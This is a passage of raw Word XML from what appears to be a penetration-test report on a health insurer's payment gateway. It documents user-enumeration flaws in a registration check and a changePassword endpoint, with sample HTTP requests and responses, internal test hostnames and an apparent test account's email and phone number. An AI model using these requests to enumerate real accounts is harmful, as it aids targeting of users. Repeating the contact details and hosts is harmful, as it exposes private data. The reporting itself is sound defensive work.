                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>userName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>jtracing48</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7B5887A4" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>emailId</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "jacob.thompson22@anthem.com",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0E588AC7" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>phoneNo</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "3179822012",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="75D0B2DB" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>userId</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "jtracing480528141553"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="626A6F19" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="11D58834" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A33B90">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="002B7238" w:rsidRPr="00A33B90" w14:paraId="08D95A25" w14:textId="77777777" w:rsidTr="002B7238">
              <w:trPr>
                <w:trHeight w:val="1520"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="47D6DFEC" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="195940F2" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Tue, 28 May 2019 18:16:06 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="101D4016" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4D3039FF" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4E2DD9B5" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 62</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5005C813" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>userNameFound</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>":true</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>,"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>emailIdFound</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>":</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>false</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>,"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>phoneNoFound</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>":</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>false</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="1563FDBC" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="0026278C" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0026278C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Image Caption: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3809C2EE" w14:textId="77777777" w:rsidR="002B7238" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below image indicates to the user that the username, email, or phone number is already stored in the database. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6987EFB0" w14:textId="77777777" w:rsidR="002B7238" w:rsidRDefault="002B7238" w:rsidP="009964AA">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46D028A0" wp14:editId="1F388BF4">
                  <wp:extent cx="4476750" cy="24955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374" t="14337" r="13339" b="7408"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4476750" cy="2495550"/>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1F031ADE" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001C6C1B" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C6C1B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>changePassword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C6C1B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="552A67A7" w14:textId="77777777" w:rsidR="002B7238" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>While navigating through the change password functionality, an attacker may modify the username field of the JSON request in order to produce a reveling error message. If the username is registered with the application, a “wrong password” error message will be produced. Similarly, if the username is not registered, a “user not found” message is produced. These are demonstrated in the HTTP requests &amp; response below.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56D74390" w14:textId="77777777" w:rsidR="002B7238" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B47D99C" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001C6C1B" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C6C1B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request 1 (valid username):</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="002B7238" w:rsidRPr="001E6A26" w14:paraId="095C7AA6" w14:textId="77777777" w:rsidTr="002B7238">
              <w:trPr>
                <w:trHeight w:val="2312"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="2E73F789"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rPr>
                    <w:t>POST /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>loginservices</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/account/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>changePassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="31EC0FA6"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rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="482114B8"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highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3824A046" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="001E6A26" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Referer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: https://payment.sit2.va.anthem.com/</w:t>
                  </w:r>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gofundhip/resetpassword</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="70257791" w14:textId="77777777" w:rsidR="002B7238"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highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6868E338"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rPr>
                    <w:t>Cache-Control: no-cache</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1AE1CAC4"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rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="632C7880"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rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>userName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="001E6A26">
                    <w:rPr>
